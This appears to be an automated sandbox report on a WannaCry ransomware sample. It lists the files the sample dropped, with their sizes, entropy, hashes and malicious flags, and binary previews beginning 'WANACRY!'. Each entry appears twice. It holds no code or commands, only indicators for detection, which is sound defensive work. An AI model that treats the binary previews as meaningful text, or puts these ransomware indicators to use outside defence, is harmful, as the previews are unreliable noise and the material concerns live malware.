                                                                                      Preview:WANACRY!..............8aT6]..u.D.......C...b..Ai.._..W.....g[A.;....X.....e.#.4..e.P..rmc\...'H...gY.w..........r.5.A...X.c..".T..G9.~=K.....zB.!d11....8%~.....M..-....P.....S..=2..$..r.....D.2...H.@.yI..=......TFq..5...c5..=}.....3R..E..#".a>0n9jC}r@k..c...P.*=.....G.......2H}:......5..+7./.w....f..9}0..L..G.g?*n........=o<Bt..-X...0.b9T.....pA.....j...h<..."i.I._.d.....{.....H...!........8..$6.....s7_..}....,}..3....q}A$!CX)....8:3..D....].h,.....G.....x.?.x..G....#~./.6....[,.41xW...KE5.v......'.....n.z.....`=ns..F.{...H....~....2Q.C1...9.......$n.[.m...{.~\/o....m...uj.......B..F.duT....+.k0.j...D.m.`....W*'..L+0.....w"W.../......"#...."cT1..A..h.`.N.;.?...>0p..8sZ)+...U.o..U......9._....0.8.eQt..!0Cw./V...w....gf...(.6>.jj...,.&.H....We.....y.U,X.........P...9..$...e)'7..-t...$.t......)kJ..?d..n........R.].Z-.P.6..k.Z.X.....w;....`3....>....s.9...6<t[..<....."...If.^...*-....d.k8cB?...@ji.jMm...<..j...q..I...zE....G.v..{....$.|...).B.z.]D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):488
                                                                                      Entropy (8bit):7.534837693528393
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkESjLagUyj1J5k2cAi/21G+ltBF5h6HFtD:bkfLtUku2a6zCFp
                                                                                      MD5:EE49EE7578E5570AF972C0CCB9171E57
                                                                                      SHA1:951A9B0AAFA7D66FA7C266D2C96D2F524B05F632
                                                                                      SHA-256:A4BCB1F53DDF5F23B434CAED9BF1DE5DEA5360AB98C0945B6904211FC2372633
                                                                                      SHA-512:E3543470779A3CA2D6322721D918525A6FD8300B7E8534BB7C7B34A0DF6A243BCEF592A69C3E34E4DFF0F26C1EE14A0EDC3BB161E14EFC697028CD7F2FD1B134
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....viU2^...&.8....F....S..$..z..a:'...: .z^.hN1. ..[.9..*K.Xh.h^_'mt.<.Xj..I]v&.e...P..............[v.N.c../.m.....$.{..TPxI...Y`N3.......Q.y1f.....5..H....O..w.k.g...q.q.'M.......9.].b._2.|.PG..C.Z...&.qS.4.J.B..#..}U.........:.....Q.1.........G.............|co..H..Z`Y.%...X...vG........N..OXn.n.6K...~G...f..*<>@..........!.v.......c.M.gp.P&.@..aH..YYO....e_.@......R*.8p........=..p.......?....:.....*.[.e.....?.)......c.:m......@....Xr..8....*.$...`
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):488
                                                                                      Entropy (8bit):7.534837693528393
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkESjLagUyj1J5k2cAi/21G+ltBF5h6HFtD:bkfLtUku2a6zCFp
                                                                                      MD5:EE49EE7578E5570AF972C0CCB9171E57
                                                                                      SHA1:951A9B0AAFA7D66FA7C266D2C96D2F524B05F632
                                                                                      SHA-256:A4BCB1F53DDF5F23B434CAED9BF1DE5DEA5360AB98C0945B6904211FC2372633
                                                                                      SHA-512:E3543470779A3CA2D6322721D918525A6FD8300B7E8534BB7C7B34A0DF6A243BCEF592A69C3E34E4DFF0F26C1EE14A0EDC3BB161E14EFC697028CD7F2FD1B134
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....viU2^...&.8....F....S..$..z..a:'...: .z^.hN1. ..[.9..*K.Xh.h^_'mt.<.Xj..I]v&.e...P..............[v.N.c../.m.....$.{..TPxI...Y`N3.......Q.y1f.....5..H....O..w.k.g...q.q.'M.......9.].b._2.|.PG..C.Z...&.qS.4.J.B..#..}U.........:.....Q.1.........G.............|co..H..Z`Y.%...X...vG........N..OXn.n.6K...~G...f..*<>@..........!.v.......c.M.gp.P&.@..aH..YYO....e_.@......R*.8p........=..p.......?....:.....*.[.e.....?.)......c.:m......@....Xr..8....*.$...`
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2040
                                                                                      Entropy (8bit):7.901079208590411
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkja1B05maPgiJtIMRLT6FhsWclhMgcJGyuj6Evs8ozUP+sa:o2KmaPgEe+LMhDclhMgG0Vs8jGx
                                                                                      MD5:F10AB014D81033DFB5CA302F3372316F
                                                                                      SHA1:32EF2C2DBE4F0C6480A87C11F57BB0169702AA3D
                                                                                      SHA-256:94F33FB2829FB232EDFB3D1ECA0A761A1C80ECD1242CA02E135453C5DD78D5CE
                                                                                      SHA-512:9EB3E12275C791C0FD5A3BB831D2A5C9613AE68EE94361FF13E07BF142557799CA23F0105E9367151EB4053DE441A6DEB26D08ED2AB9BE792D854DF6C380B29F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......AT.G6........[8...t|W..:....I..@...k..b.'i......x..!....bLh.J...r..9Y.5..U./.k..........V.r...'.|.;...a4....A....p.....`...@.t..45.Xe.......Z).5-.&.....g.XF..hKc.j.(k.....R...y........~.h....~{...e&4Ju.5r.3.v....m$L.'.w._.i...m./eU.r'./...u............y^.|?3>..A)....h.T,...5.....e.E0...)..J...s...9C>...'.A.o8.o.=)...\.S.b.x..E).;X.....^B..x9bpb.R.......5G.U...W5.H.u.i<...hP.w_.m.}9>.....,Q......1.~....VI...t).....^..(.`m:..f..vp..cT.".3,{O.....)h....Xsk.........p...p:...."./v....X...wl#...6...h..Q.px.,.z..W.J".XM..,..^..A..........?.....{.y...G.W...`UU.|G..}....,_..EpQ..D<...Kk...anp:....).#pF_..@...@....*x.Z.f.a.yr.V.^N......9.....+TK.,F..B........%vK..._.P............d.x...../(...(..ad..r.....x.9.A..b.m...-F...=.....h.&]....V.i.vP,f.....W...U..`..9,...\8..../....+n......W.~.G.....<..@.U.j.}..3Gq/....Q..Y...Y&y(Q*...k..f......d?.|..|t<?Q.V..gO..}..d.A..j.f.%?...m..F.g.UB.....u.@4....RQ..6/...1..n.s.I.e.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2040
                                                                                      Entropy (8bit):7.901079208590411
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkja1B05maPgiJtIMRLT6FhsWclhMgcJGyuj6Evs8ozUP+sa:o2KmaPgEe+LMhDclhMgG0Vs8jGx
                                                                                      MD5:F10AB014D81033DFB5CA302F3372316F
                                                                                      SHA1:32EF2C2DBE4F0C6480A87C11F57BB0169702AA3D
                                                                                      SHA-256:94F33FB2829FB232EDFB3D1ECA0A761A1C80ECD1242CA02E135453C5DD78D5CE
                                                                                      SHA-512:9EB3E12275C791C0FD5A3BB831D2A5C9613AE68EE94361FF13E07BF142557799CA23F0105E9367151EB4053DE441A6DEB26D08ED2AB9BE792D854DF6C380B29F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......AT.G6........[8...t|W..:....I..@...k..b.'i......x..!....bLh.J...r..9Y.5..U./.k..........V.r...'.|.;...a4....A....p.....`...@.t..45.Xe.......Z).5-.&.....g.XF..hKc.j.(k.....R...y........~.h....~{...e&4Ju.5r.3.v....m$L.'.w._.i...m./eU.r'./...u............y^.|?3>..A)....h.T,...5.....e.E0...)..J...s...9C>...'.A.o8.o.=)...\.S.b.x..E).;X.....^B..x9bpb.R.......5G.U...W5.H.u.i<...hP.w_.m.}9>.....,Q......1.~....VI...t).....^..(.`m:..f..vp..cT.".3,{O.....)h....Xsk.........p...p:...."./v....X...wl#...6...h..Q.px.,.z..W.J".XM..,..^..A..........?.....{.y...G.W...`UU.|G..}....,_..EpQ..D<...Kk...anp:....).#pF_..@...@....*x.Z.f.a.yr.V.^N......9.....+TK.,F..B........%vK..._.P............d.x...../(...(..ad..r.....x.9.A..b.m...-F...=.....h.&]....V.i.vP,f.....W...U..`..9,...\8..../....+n......W.~.G.....<..@.U.j.}..3Gq/....Q..Y...Y&y(Q*...k..f......d?.|..|t<?Q.V..gO..}..d.A..j.f.%?...m..F.g.UB.....u.@4....RQ..6/...1..n.s.I.e.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):843176
                                                                                      Entropy (8bit):7.999760090546652
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:kB2pcdOGVxMhMWff5SBPMz7knclq5rdqNikuuJ:kytMWH5SBPMz7kclKrdc/tJ
                                                                                      MD5:6DD12E72212D81489E4F20732168C053
                                                                                      SHA1:158078CA4DB68831DF94A73461B3F79AC19B34FC
                                                                                      SHA-256:7713B3980302A515ADCEFE8504005ACD61A3F0A1D65C0837F50B927169883B5F
                                                                                      SHA-512:F1A0209E2DD96889B65213A0D8F3F0888C47C16B5F68E74A189E7D43533C221E0D7892C1CB0285FCCDDE2BBE48633A93C63911EAEAF4D3E01DDC6248FF589AAC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....R|c...^...>....6..-..=q...C...B...h.$...}U+...6O.K.....M...VzB!]J.F._.4...b...yX.....'I..q....:.*...f...L..(f....OZ+.n9*@..@..}.e....?upLx?..^G.C-...O.f......)..;../t.z+@..Wu.K.(.C.CL..#....L{.b...-..V.=R..."...)(.O...~.D.l.h{(HE.G.k:...jN.............6,.a..R..;D.R.H.T.......UH.....~....g~>.t=.....mM:#..9.Y.|.dw.u..qj...K.q7o2f..X...iw.._...:7.D= ......2..DE........F}W....O.e...-..gy-j............m.@.8.mqu.T@.W..Q..C..x......OL.=.5......o....z.'\.R..]........to...2+XS....f.Oci..5=.A}R....{..i.`.S..0.3T0.2..T.YWc..^-.Q...'....Z.4H.).]..N.....5.~......*...ZDtu.G&...|...}m..).o.`..d..?.|^Rs..`'.i.=.k+..............4.w.vQu......@O......@z..7d.3Y.....a..06M..i8.........i....ER...B.....5...5....*...../.u2....k,..0`.'.uc.].Hb...5........7^.:.f.Q'..4gd..B.J...........&..b..V.;5kR...*...........,X..'Y0..j..h%.vA.KA..^...S...<H......y.iL../..y.z/O..<........(.~v.}.{.}.|.7_}.\..%T....9nY..V....{P...XdQ.&....+u.i..c.Z..;`..9~FX.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):843176
                                                                                      Entropy (8bit):7.999760090546652
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:kB2pcdOGVxMhMWff5SBPMz7knclq5rdqNikuuJ:kytMWH5SBPMz7kclKrdc/tJ
                                                                                      MD5:6DD12E72212D81489E4F20732168C053
                                                                                      SHA1:158078CA4DB68831DF94A73461B3F79AC19B34FC
                                                                                      SHA-256:7713B3980302A515ADCEFE8504005ACD61A3F0A1D65C0837F50B927169883B5F
                                                                                      SHA-512:F1A0209E2DD96889B65213A0D8F3F0888C47C16B5F68E74A189E7D43533C221E0D7892C1CB0285FCCDDE2BBE48633A93C63911EAEAF4D3E01DDC6248FF589AAC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....R|c...^...>....6..-..=q...C...B...h.$...}U+...6O.K.....M...VzB!]J.F._.4...b...yX.....'I..q....:.*...f...L..(f....OZ+.n9*@..@..}.e....?upLx?..^G.C-...O.f......)..;../t.z+@..Wu.K.(.C.CL..#....L{.b...-..V.=R..."...)(.O...~.D.l.h{(HE.G.k:...jN.............6,.a..R..;D.R.H.T.......UH.....~....g~>.t=.....mM:#..9.Y.|.dw.u..qj...K.q7o2f..X...iw.._...:7.D= ......2..DE........F}W....O.e...-..gy-j............m.@.8.mqu.T@.W..Q..C..x......OL.=.5......o....z.'\.R..]........to...2+XS....f.Oci..5=.A}R....{..i.`.S..0.3T0.2..T.YWc..^-.Q...'....Z.4H.).]..N.....5.~......*...ZDtu.G&...|...}m..).o.`..d..?.|^Rs..`'.i.=.k+..............4.w.vQu......@O......@z..7d.3Y.....a..06M..i8.........i....ER...B.....5...5....*...../.u2....k,..0`.'.uc.].Hb...5........7^.:.f.Q'..4gd..B.J...........&..b..V.;5kR...*...........,X..'Y0..j..h%.vA.KA..^...S...<H......y.iL../..y.z/O..<........(.~v.}.{.}.|.7_}.\..%T....9nY..V....{P...XdQ.&....+u.i..c.Z..;`..9~FX.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11832
                                                                                      Entropy (8bit):7.983829173007048
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:55BT7O+1UqZSNjqDAmxbyjLvp/1MZmjFRO13MD6S+WBJ9QqLQ5/cBCuVon4JJzI2:FP6qZWjqDOLMMjFRO13JSVn93YjuVo65
                                                                                      MD5:0A952E3E4A0150E5546EDCF7AE8DBB1E
                                                                                      SHA1:413DE889B396D0A3E571966D90DCEAA5378252E6
                                                                                      SHA-256:F26F89817FA47F3CEFBD6C952958E08ADE96C4C3B3D19FFD8E8A5B7B6E9FE460
                                                                                      SHA-512:285F77F14B484101C2F868CC632A8035A4B5977252DE56EF1433AA799149D307B5A4AA23DEDC54AA2F6EA5489E8B1C317FB9096D456AF5DF7403CB4346AB2F7B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......)...HI.C.t#...+...z.E....3.2.h..1.%...e.-.NR?.(..8....... ......<.[I....?..\.j9@.4T..r=.......q.....C+..dXR_..t...g...B7A......LC...K....|...fC.3U1..F. ;...+'e..g.....`._c..L.. .F..l ..}-O.&]z6...>.....'......A....f..:.|&.9.f...........b V.}Y......-........0..{....Nz...8..Z.....*...f....<..i.$......_3..,.S...:.1O.l....h...|..;.9..G...b:!... .....f[......]..N.a...."....O.@.;%.*KC.F.r^?...'......E..`..SP\."...Z....lq.w......k...MMf..46.f...}$lY..z2.m.\.Pk.... ,.-.2......&dv.!T......x5.K.m.[W(.9...A..i.S}D`........ue.k.....v...,....u...-[.27b.#]..y...\.n5..S^...^z....Uh...e...%...yZ..o..A.o..|.q..z.].6.."7*.z..{. "...nk.;.P~8...+........<..P.<~...8@....K'.....u..f..=..cv..\U...).V.ff/..C...V.O...Gg........."W..1..B....$.L9.3.D..?6q..P7.....#..LsZ7S..S.y....Mi....`~.j.}..3.oA..;.i-XM)...OT.k..Efn....K\&....4..\....MqC9...%.0G.W9*...P..Vf.@j..3....!7d*.......0H.q.&Z*M.....X..I..ki..(.`..X. [D^...Y.B..n.@ae.x..!......l.6.......O.VCp.6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11832
                                                                                      Entropy (8bit):7.983829173007048
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:55BT7O+1UqZSNjqDAmxbyjLvp/1MZmjFRO13MD6S+WBJ9QqLQ5/cBCuVon4JJzI2:FP6qZWjqDOLMMjFRO13JSVn93YjuVo65
                                                                                      MD5:0A952E3E4A0150E5546EDCF7AE8DBB1E
                                                                                      SHA1:413DE889B396D0A3E571966D90DCEAA5378252E6
                                                                                      SHA-256:F26F89817FA47F3CEFBD6C952958E08ADE96C4C3B3D19FFD8E8A5B7B6E9FE460
                                                                                      SHA-512:285F77F14B484101C2F868CC632A8035A4B5977252DE56EF1433AA799149D307B5A4AA23DEDC54AA2F6EA5489E8B1C317FB9096D456AF5DF7403CB4346AB2F7B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......)...HI.C.t#...+...z.E....3.2.h..1.%...e.-.NR?.(..8....... ......<.[I....?..\.j9@.4T..r=.......q.....C+..dXR_..t...g...B7A......LC...K....|...fC.3U1..F. ;...+'e..g.....`._c..L.. .F..l ..}-O.&]z6...>.....'......A....f..:.|&.9.f...........b V.}Y......-........0..{....Nz...8..Z.....*...f....<..i.$......_3..,.S...:.1O.l....h...|..;.9..G...b:!... .....f[......]..N.a...."....O.@.;%.*KC.F.r^?...'......E..`..SP\."...Z....lq.w......k...MMf..46.f...}$lY..z2.m.\.Pk.... ,.-.2......&dv.!T......x5.K.m.[W(.9...A..i.S}D`........ue.k.....v...,....u...-[.27b.#]..y...\.n5..S^...^z....Uh...e...%...yZ..o..A.o..|.q..z.].6.."7*.z..{. "...nk.;.P~8...+........<..P.<~...8@....K'.....u..f..=..cv..\U...).V.ff/..C...V.O...Gg........."W..1..B....$.L9.3.D..?6q..P7.....#..LsZ7S..S.y....Mi....`~.j.}..3.oA..;.i-XM)...OT.k..Efn....K\&....4..\....MqC9...%.0G.W9*...P..Vf.@j..3....!7d*.......0H.q.&Z*M.....X..I..ki..(.`..X. [D^...Y.B..n.@ae.x..!......l.6.......O.VCp.6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):408
                                                                                      Entropy (8bit):7.445009678853076
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEHm7/lgUcXeQ6tqj7QRRoohfr62Ig7ive:bksm7/OUkvQz8Xg7
                                                                                      MD5:307356A16A756D72B10D5C56FF70CBAC
                                                                                      SHA1:B895B1C0EF9E71500CA8B6F705F1906D533BA3BA
                                                                                      SHA-256:715CB94D323F7FD722A17A111A9EA6F0BAA7AB72AEAB73314D9686F2D01F4704
                                                                                      SHA-512:743C5EBF416525D0F46467A7D91C3FE9CCB8EDB2B59DB6B6AC68F836C05E4949D766E44EC86A1BD4EE000A7BF4416232A824AEAA9A8E5F524BED3013AA09DB78
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......vKM..........r..........!.]...TvY,.Z.!_..^.t.v......Sn...k)r=..3.HI%..q6R....NZ.P....U.K....O9D.......6/~O..F&ADm?.$.O*9=rZQ.........Zf.....u.$.w.&hh.CS.|. Q..?..".xoQ......L..r[.iL..n.L...`e......(..(..{....Rq.G....+bc....ec..8.S......i........y.......> .......2......I$m..!.J.W....u..6r.s..(.sM8.0m..b5.......:...Y......B....z.S.F..<.V...s....G...3...Q....=.L.a....t..J./.._D
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):408
                                                                                      Entropy (8bit):7.445009678853076
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEHm7/lgUcXeQ6tqj7QRRoohfr62Ig7ive:bksm7/OUkvQz8Xg7
                                                                                      MD5:307356A16A756D72B10D5C56FF70CBAC
                                                                                      SHA1:B895B1C0EF9E71500CA8B6F705F1906D533BA3BA
                                                                                      SHA-256:715CB94D323F7FD722A17A111A9EA6F0BAA7AB72AEAB73314D9686F2D01F4704
                                                                                      SHA-512:743C5EBF416525D0F46467A7D91C3FE9CCB8EDB2B59DB6B6AC68F836C05E4949D766E44EC86A1BD4EE000A7BF4416232A824AEAA9A8E5F524BED3013AA09DB78
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......vKM..........r..........!.]...TvY,.Z.!_..^.t.v......Sn...k)r=..3.HI%..q6R....NZ.P....U.K....O9D.......6/~O..F&ADm?.$.O*9=rZQ.........Zf.....u.$.w.&hh.CS.|. Q..?..".xoQ......L..r[.iL..n.L...`e......(..(..{....Rq.G....+bc....ec..8.S......i........y.......> .......2......I$m..!.J.W....u..6r.s..(.sM8.0m..b5.......:...Y......B....z.S.F..<.V...s....G...3...Q....=.L.a....t..J./.._D
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14632
                                                                                      Entropy (8bit):7.9865434143181675
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:C5egzQ/t0FftgyqOdO6p/FoaOm9HXK4gQH/kULx8DcgOtr84jpSuPuOC4auLXDbw:DtOdOW9oaOm5a4gQH//eStg47suCVmPO
                                                                                      MD5:DF2E50F1C1ADA86D3B84D9A77FD37C92
                                                                                      SHA1:A20BF4E22FB4639E9C0CBDD67215F567465EF42F
                                                                                      SHA-256:EA1BC7CFCEE416EBF25BCF29715E0DDD2918B49A3A349DA3677A22DA4F503C62
                                                                                      SHA-512:27AF4293DA57FFED106ED18E1622C36D127FC6718113396138D9D1B9B4409BB131502DE071A23EC7B2252CF4A8FD8931AB5E441BF0C339FF239C59E739938267
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..... .W/..".:..u](.!..[k~...|6.b..L...L.2.QDX#...F.1...M ..Q.}C.aU..F..e?.u[X.e3n[.jA.m...o...6..=.....D..Q:w..8J.F..&.#....wM..n."K.f.v..\..U$<V.*..$.m..........b]..`...8Ac.A..f..k...f*..is|....%B<.v...U...P....$.E?.~.fI..4..}81.....!.g......|.|.W}<E.....8......7@T)....."\{.....g..U_.a.rE.{%5..........#.MOM.........d.o)....LqG3...F.Y.c?.....L.h.*..E....Z8XV......~.rWp`..8{.ZF~.....X.w|5R.80..mps...4H...[..<...WH|.$.......y...4... ....P.GR..........j.B.|.h......8...?Q.......Q.*...I..K44N.s.b.6.y0.c.I...&u.,P2.Sf\..C.&.oh/:4...1....+....N...I....m.l...F..._.'....Q.[".!.9cDD....S4....3q%b.{OF(.....&.<;.u"M[.+..^.A..#.(.......b.....J :H$...R..ka....+..a....X(..'O...9.".=.v.~...%..1...3.$.-...co..k/pQU..K*.n..p.&DSC...h^x...ZW.>..G....z...Y.-..o.!...j..W..xQ....6......5.R..@.T'......p.#......M>..Cq....p....d..#.lOI ..j..@...T...].e,.y......N..pr.CT...^+tGA~.......c../.6..Y..cm..}....T.<.+.._..H*e..y.R3..UBZ..I...j.p...W...(t.^....C........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14632
                                                                                      Entropy (8bit):7.9865434143181675
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:C5egzQ/t0FftgyqOdO6p/FoaOm9HXK4gQH/kULx8DcgOtr84jpSuPuOC4auLXDbw:DtOdOW9oaOm5a4gQH//eStg47suCVmPO
                                                                                      MD5:DF2E50F1C1ADA86D3B84D9A77FD37C92
                                                                                      SHA1:A20BF4E22FB4639E9C0CBDD67215F567465EF42F
                                                                                      SHA-256:EA1BC7CFCEE416EBF25BCF29715E0DDD2918B49A3A349DA3677A22DA4F503C62
                                                                                      SHA-512:27AF4293DA57FFED106ED18E1622C36D127FC6718113396138D9D1B9B4409BB131502DE071A23EC7B2252CF4A8FD8931AB5E441BF0C339FF239C59E739938267
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..... .W/..".:..u](.!..[k~...|6.b..L...L.2.QDX#...F.1...M ..Q.}C.aU..F..e?.u[X.e3n[.jA.m...o...6..=.....D..Q:w..8J.F..&.#....wM..n."K.f.v..\..U$<V.*..$.m..........b]..`...8Ac.A..f..k...f*..is|....%B<.v...U...P....$.E?.~.fI..4..}81.....!.g......|.|.W}<E.....8......7@T)....."\{.....g..U_.a.rE.{%5..........#.MOM.........d.o)....LqG3...F.Y.c?.....L.h.*..E....Z8XV......~.rWp`..8{.ZF~.....X.w|5R.80..mps...4H...[..<...WH|.$.......y...4... ....P.GR..........j.B.|.h......8...?Q.......Q.*...I..K44N.s.b.6.y0.c.I...&u.,P2.Sf\..C.&.oh/:4...1....+....N...I....m.l...F..._.'....Q.[".!.9cDD....S4....3q%b.{OF(.....&.<;.u"M[.+..^.A..#.(.......b.....J :H$...R..ka....+..a....X(..'O...9.".=.v.~...%..1...3.$.-...co..k/pQU..K*.n..p.&DSC...h^x...ZW.>..G....z...Y.-..o.!...j..W..xQ....6......5.R..@.T'......p.#......M>..Cq....p....d..#.lOI ..j..@...T...].e,.y......N..pr.CT...^+tGA~.......c../.6..Y..cm..}....T.<.+.._..H*e..y.R3..UBZ..I...j.p...W...(t.^....C........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1946312
                                                                                      Entropy (8bit):7.999904189858861
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:3JvjKnwBuExoh6nrUCQAFycCPG/xzPqxY5Gi97LAQ:3pjKwBNmh6nbzFyoMst977
                                                                                      MD5:D8FDBD25B546D5A04B207010B23EB0A3
                                                                                      SHA1:9ABF7C68EA2CA5D936DF38D8694A3ACDC983F61A
                                                                                      SHA-256:35F9D9347A14F34C0963107A591F4324F1374A93027B4F9C4EAF2DB37FE45C2B
                                                                                      SHA-512:847BF768C2A6969AA2022B4729206266ADB3248BBAAC1658A2CABE030980B6904F492101CA51BCD08E49F8E61C3E1FD5AFA664D21E89357353BBADA3D8838E67
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......#.2.......x!.v.q\Uk..!.s....[...-..8.....gxL.....7.r....\...f.[.."^....0.z..A.>"...).+d..L.@.."$(..0..=K.D....P....e..).VS.JV.].V..GvB>...1.J.....]..an4.0.y.lF.k....).!e.0n.P...\...(.N...z.z...........KLp..z.s...[..rx..(M.W.fd....(oi/eK..h...*Nr............a.ey.......9.qQ2.;.`(....u.].A..Z6.d~.ef.+n.#6(/E\!G....d....4........N.2.~...'....vN).i...TG.-....C.G.!M.!.E."R7.w.n.{..9._+....zLC.+.5W.Q1....}...hl...F..b..8.J...W...._.U.P.(..5....X.pH.`T9....$Q..).........H/.&...3h....P..xLb....<p....g......E?..Q.zJd.e`....2.f2m.X.]..cU/.6....=.7..b...b.......~..B.zs"P../=.J....._/...Z\.%..K.Hx........G....?7P.....xA._....u.D..B.`..y.)W.|P....P....-...xM......W...O_..*0..%(.....O...wUU#.4....H........e.:.4q.q..k....u.2:."#|..Q^e+..V....c.^M..'.{.z)R.c....m..5.*...R.)!.#.........'..........C.K.z[aj;]%..V..:nL..3p....i........o..'E.z...*9...a+rx.8jvTt...0...+.4..(.)...L..D.<<....i.. v........Q.g........?......?. .@&xuv..m..^...D.^..;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1946312
                                                                                      Entropy (8bit):7.999904189858861
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:3JvjKnwBuExoh6nrUCQAFycCPG/xzPqxY5Gi97LAQ:3pjKwBNmh6nbzFyoMst977
                                                                                      MD5:D8FDBD25B546D5A04B207010B23EB0A3
                                                                                      SHA1:9ABF7C68EA2CA5D936DF38D8694A3ACDC983F61A
                                                                                      SHA-256:35F9D9347A14F34C0963107A591F4324F1374A93027B4F9C4EAF2DB37FE45C2B
                                                                                      SHA-512:847BF768C2A6969AA2022B4729206266ADB3248BBAAC1658A2CABE030980B6904F492101CA51BCD08E49F8E61C3E1FD5AFA664D21E89357353BBADA3D8838E67
                                                                                      Malicious:true
                                                                                      Reputation:low
